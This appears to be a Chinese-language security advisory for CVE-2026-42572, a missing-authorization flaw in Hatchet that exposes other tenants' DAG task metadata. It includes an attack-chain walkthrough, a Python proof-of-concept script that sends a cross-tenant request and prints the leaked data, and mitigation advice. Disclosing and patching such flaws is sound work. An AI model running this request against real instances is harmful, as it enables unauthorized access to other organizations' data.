CVE-2026-42572 CVSS 5.3 中危

CVE-2026-42572 Hatchet越权访问漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42572

漏洞类型

越权访问

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Hatchet

漏洞概述

Hatchet是一个用于编排后台任务的平台。在0.83.39版本之前，由于GET /api/v1/stable/dags/tasks端点缺少授权指令，导致租户成员资格检查被跳过。攻击者只需登录同一Hatchet实例下的任意租户，即可利用该漏洞查询其他租户的DAG任务元数据，造成敏感信息泄露。

技术细节

该漏洞源于Hatchet在特定API端点（GET /api/v1/stable/dags/tasks）上未正确实施访问控制。正常情况下，系统应验证请求者是否属于目标租户（Tenant UUID），但在受影响版本中，该校验逻辑被绕过。攻击者首先需要拥有同一Hatchet实例中任意一个租户的有效认证凭证（低权限用户）。随后，攻击者构造HTTP GET请求，在URL参数中指定目标受害者的Tenant UUID和DAG UUID。由于缺乏授权指令，后端直接处理请求并返回对应租户的任务元数据，而未验证请求者与该租户的从属关系。这属于典型的水平越权漏洞，允许跨租户数据访问。

攻击链分析

STEP 1

步骤1

攻击者在目标Hatchet实例上注册并登录任意租户，获取有效认证令牌。

STEP 2

步骤2

攻击者通过枚举或猜测获取目标受害者的Tenant UUID和DAG UUID。

STEP 3

步骤3

攻击者向/api/v1/stable/dags/tasks端点发送GET请求，携带自己的令牌和受害者的UUID参数。

STEP 4

步骤4

服务器因缺少授权检查返回受害者的任务元数据，导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# POC for CVE-2026-42572
# Exploit: Missing authorization on /api/v1/stable/dags/tasks
# Attacker needs a valid token from ANY tenant on the instance.

target_url = "http://target-hatchet-instance.com/api/v1/stable/dags/tasks"
attacker_token = "VALID_TOKEN_FROM_ANY_TENANT" # Low privilege user token

headers = {
    "Authorization": f"Bearer {attacker_token}",
    "Content-Type": "application/json"
}

# Parameters representing the victim's tenant and DAG
params = {
    "tenant_id": "VICTIM_TENANT_UUID",
    "dag_id": "VICTIM_DAG_UUID"
}

response = requests.get(target_url, headers=headers, params=params)

if response.status_code == 200:
    print("Vulnerability Exploited Successfully!")
    print("Leaked Data:", response.json())
else:
    print("Exploit Failed. Status Code:", response.status_code)

影响范围

Hatchet < 0.83.39

防御指南

临时缓解措施

建议在升级前，通过网络ACL限制对受影响端点的访问，或在应用中间件层增加逻辑，强制校验请求者身份与请求参数中Tenant ID的一致性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表